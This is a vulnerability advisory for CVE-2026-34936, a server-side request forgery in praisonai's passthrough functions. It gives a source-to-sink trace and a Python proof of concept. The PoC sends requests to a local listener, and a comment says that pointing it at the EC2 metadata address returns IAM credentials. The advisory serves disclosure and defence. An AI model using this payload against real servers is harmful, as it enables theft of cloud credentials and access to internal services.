CVE-2026-34936

### Summary `passthrough()` and `apassthrough()` in `praisonai` accept a caller-controlled `api_base` parameter that is concatenated with `endpoint` and passed directly to `httpx.Client.request()` when the litellm primary path raises `AttributeError`. No URL scheme validation, private IP filtering, or domain allowlist is applied, allowing requests to any host reachable from the server. ### Details `passthrough.py:92` (source) -> `passthrough.py:109` (fallback trigger) -> `passthrough.py:110` (sink) ```python # source -- api_base taken directly from caller def passthrough(endpoint, api_base=None, method="GET", ...): # fallback trigger -- AttributeError from unrecognised provider enters fallback except AttributeError: url = f"{api_base or 'https://api.openai.com'}{endpoint}" # sink -- no validation before request response = client.request(method, url=url, ...) ``` ### PoC ```python # tested on: praisonai 1.5.87 (source install) # install: pip install -e src/praisonai # start listener: python3 -m http.server 8888 import sys, litellm sys.path.insert(0, 'src/praisonai') del litellm.llm_passthrough_route from praisonai.capabilities.passthrough import passthrough result = passthrough( endpoint="/ssrf-test", api_base="http://127.0.0.1:8888", method="GET", custom_llm_provider="__nonexistent__", ) print(result) # expected output: PassthroughResult(data='...', status_code=404, headers={'server': 'SimpleHTTP/0.6 Python/3.12.3', ...}) # listener logs: "GET /ssrf-test HTTP/1.1" 404 # on EC2 with IMDSv1: api_base="http://169.254.169.254" returns IAM credentials ``` ### Impact On cloud infrastructure with IMDSv1 enabled, an attacker can retrieve IAM credentials via the EC2 metadata service. Internal services (Redis, Elasticsearch, Kubernetes API) are reachable without authentication from within the VPC. The Flask API server deploys with `AUTH_ENABLED = False` by default, making this reachable over the network without credentials.